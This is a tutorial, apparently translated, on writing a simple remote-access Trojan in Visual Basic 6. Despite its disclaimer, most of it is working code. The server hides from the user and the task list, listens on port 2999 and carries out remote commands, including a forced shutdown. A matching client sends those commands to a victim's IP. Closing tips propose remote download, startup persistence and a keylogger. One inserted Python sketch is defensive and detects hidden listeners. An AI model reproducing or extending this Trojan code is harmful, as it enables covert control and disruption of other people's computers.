How to write a simple Trojan in VB6

We are not posting this article to encourage you to write viruses that destroy user data. We only want it to give you some understanding of how a virus is built. From it you can also develop ideas for anti-virus software, once we clearly understand the path a network virus takes.

Writing a Trojan is much easier than most people think. All it really takes is two simple applications with fewer than 100 lines of code. The first program is the client, the program the user knows about. The second is the server, the actual "trojan" part. Now we will look at what we need for both, along with some sample code.

Server

The server is the Trojan part of the program. It needs to be hidden so that an ordinary user cannot find it.
To do this, you start with the following code:

Private Sub Form_Load()
    ' Do not show the form on screen
    Me.Visible = False
End Sub

This code makes the program invisible to the naked eye, but it can still be detected in the Windows Task Manager, so if we want the program to hide better, we can write the code as follows:

Private Sub Form_Load()
    Me.Visible = False
    ' Keep the program out of the task list
    App.TaskVisible = False
End Sub

(In Windows, every program with the .exe extension is shown in the list of running programs. However, your program will be hidden from the Running Applications List.)

Now we have a program that is invisible to the ordinary user, with only four lines of code. However, it is still too simple; we can improve it by adding some functions.
First, to make it able to "listen" for connections once it has got onto a machine, we need to add a Winsock Control.
I named my control "win". You can name yours anything you like.
To make the Trojan "listen" on port 2999 at startup, we write the following code:

Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
    ' Listen for incoming TCP connections on port 2999
    win.LocalPort = 2999
    win.RemotePort = 455
    win.Listen
End Sub

This code opens a local port, port 2999, and the port it sends to is 445.
Now the program can "listen", but it does not yet do anything definite.
We add the following code to the main form:

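Private Sub win_ConnectionRequest(ByVal requestID As Long)
    ' Close the listening socket, then accept the incoming connection
    win.Close
    win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    Dim GotDat As String
    ' Read the received data and hand it to DoActions
    win.GetData GotDat
    DoActions GotDat
End Sub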

Next, we will write the DoActions function as a subroutine to be called from the main form. The code above performs two tasks: first, it makes every connection request be accepted automatically; second, it makes all incoming data be accepted automatically and then passes all of that data to the DoActions function that we will write below.

The DoActions function should be declared public so that code outside the module can use it as well. Add the following code to the module, as we continue working on the Trojan's server:

Public Function DoActions(x As String)
    ' Dispatch on the command string received from the client
    Select Case x
        Case "msgbox"
            MsgBox "The file C:\windows\getboobies.exe has caused an error and will be terminated", vbCritical, "Critical Error"
        Case "shutdown"
            Shell "shutdown -s -f -t 00"
    End Select
End Function

Now you have a program that displays a message box on the victim's computer when the data "msgbox" is sent to port 2999. When the data "shutdown" is sent to port 2999, it shuts down the victim's computer. I use the "Select Case" statement so that the code is easy to modify later. Congratulations, you have just written your first Trojan. Now let us review the complete code.

Main Form

Private Sub Form_Load()
    Me.Visible = False
    App.TaskVisible = False
    win.LocalPort = 2999
    win.RemotePort = 455
    win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long)
    win.Close
    win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    Dim GotDat As String
    win.GetData GotDat
    DoActions GotDat
End Sub

Remember to add the Winsock control and name it "win" if you use this code:

Module

Public Function DoActions(x As String)
    Select Case x
        Case "msgbox"
            MsgBox "The file C:\windows\getboobies.exe has caused an error and will be terminated", vbCritical, "Critical Error"
        Case "shutdown"
            Shell "shutdown -s -f -t 00"
    End Select
End Function
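
A defender's view of the server above, as an added example that is not part of the original article: hiding the form and the task-list entry removes neither the process from the process list nor its listening socket from `netstat`, so this Python sketch flags interactive-session processes that listen on a non-loopback TCP port yet report no window title. The `netstat -ano` and `tasklist /v /fo csv` text is constructed sample data, the process names (including `server.exe`) are hypothetical, and the sketch assumes tasklist reports "N/A" as the window title of a process with no visible window and "Services" as the session name of service processes.

```python
import csv
import io

# Constructed sample of `netstat -ano` output (not captured from a real host).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:2999           0.0.0.0:0              LISTENING       4321
  TCP    127.0.0.1:5939         0.0.0.0:0              LISTENING       2210
  TCP    10.0.0.5:49822         10.0.0.9:443           ESTABLISHED     5120
  TCP    [::]:8080              [::]:0                 LISTENING       6001
"""

# Constructed sample of `tasklist /v /fo csv` output; names are hypothetical.
TASKLIST = '''\
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","912","Services","0","9,876 K","Unknown","NT AUTHORITY\\NETWORK SERVICE","0:00:01","N/A"
"server.exe","4321","Console","1","5,432 K","Running","PC\\user","0:00:00","N/A"
"agent.exe","2210","Console","1","20,000 K","Running","PC\\user","0:00:02","N/A"
"devserver.exe","6001","Console","1","30,000 K","Running","PC\\user","0:00:05","Dev Server"
'''

def listeners(netstat_text):
    """Map PID -> list of TCP listening ports reachable from other hosts."""
    found = {}
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            addr, _, port = f[1].rpartition(":")
            if addr not in ("127.0.0.1", "[::1]"):  # skip loopback-only sockets
                found.setdefault(int(f[4]), []).append(int(port))
    return found

def hidden_listeners(netstat_text, tasklist_csv):
    """Interactive-session processes that listen on TCP but show no window."""
    ports = listeners(netstat_text)
    hits = []
    for row in csv.DictReader(io.StringIO(tasklist_csv)):
        pid = int(row["PID"])
        if (pid in ports and row["Session Name"] != "Services"
                and row["Window Title"] == "N/A"):
            hits.append((row["Image Name"], pid, sorted(ports[pid])))
    return hits

if __name__ == "__main__":
    for name, pid, open_ports in hidden_listeners(NETSTAT, TASKLIST):
        print(f"review: {name} (PID {pid}) listens on {open_ports}, no window")
```

This is a triage heuristic: legitimate background agents can match it too, so each hit needs a check of the binary's path and origin.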

That is all there is to the server part of the Trojan. Now let us look at the client.

Client

The client is what you interact with. You use it to connect to the remote server (the trojan) and send it commands. Now that we have written a server that accepts the "shutdown" and "msgbox" commands, let us create a client that sends them.

Create a form and add a Winsock Control, a text box and four buttons. In the code below the text box is named txtIP, and the buttons are named cmdConnect, cmdMsgbox, cmdShutdown and cmdDisconnect. The code is as follows:

Private Sub cmdConnect_Click()
    Dim IpAddy As String
    ' Take the target address from the text box and connect to port 2999
    IpAddy = txtIp.Text
    Win.Close
    Win.RemotePort = 2999
    Win.RemoteHost = IpAddy
    Win.LocalPort = 9999
    Win.Connect
    cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
    Win.Close
    cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
    Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
    Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is take the IP address from txtIP and connect to remote port 2999. Once connected, you can send the data "shutdown" or "msgbox" to the server, and the corresponding action is carried out (shutting down the computer or displaying a message box).

These two programs do very little, but they can quickly be improved into a powerful remote administration tool if you know what you are doing. I suggest trying to add error handling and more functions to both the client and the server.

Tips

Make the server able to download a file specified by the attacker.

Add code so that the server is executed at startup (a registry key).

And a keylogger for the server: make it send information to the attacker.

There are many things you can do; just use your imagination.

By T.Thu

Article source http://w4rum.com/20.t

[By Phan Vien] [10/Oct/06]
 